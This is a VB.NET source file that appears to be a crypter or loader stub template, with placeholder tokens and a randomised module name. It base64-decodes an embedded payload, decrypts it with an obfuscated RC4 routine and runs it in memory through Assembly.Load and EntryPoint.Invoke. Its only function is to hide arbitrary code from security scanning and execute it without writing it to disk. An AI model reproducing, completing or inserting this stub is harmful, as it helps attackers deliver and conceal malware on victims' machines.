Imports System.Security.Cryptography
Imports System.Text

Module rNEXDSSyvIx


    Sub main()

        Dim %1% As String = "%2%"




        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), "%8%")





        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        %4%.EntryPoint.Invoke(Nothing, Nothing)


    End Sub
    Public Function %5%(ByVal D1 As Byte(), ByVal D2 As String) As Byte()
        Dim D3 As Byte() = System.Text.Encoding.ASCII.GetBytes(D2)
        Dim D4, D5, D6 As UInteger
        Dim D7 As UInteger() = New UInteger(255) {}
        Dim D8 As Byte() = New Byte(D1.Length - 1) {}
        For D4 = 0 To 255
            D7(D4) = D4
        Next
        For D4 = 0 To 255
            D5 = (D5 + D3(D4 Mod D3.Length) + D7(D4)) And 255
            D6 = D7(D4)
            D7(D4) = D7(D5)
            D7(D5) = D6
        Next
        D4 = 0 : D5 = 0
        For D9 = 0 To D8.Length - 1
            D4 = (D4 + 1) And 255
            D5 = (D5 + D7(D4)) And 255
            D6 = D7(D4)
            D7(D4) = D7(D5)
            D7(D5) = D6
            D8(D9) = D1(D9) Xor D7((D7(D4) + D7(D5)) And 255)
        Next
        Return D8
    End Function
End Module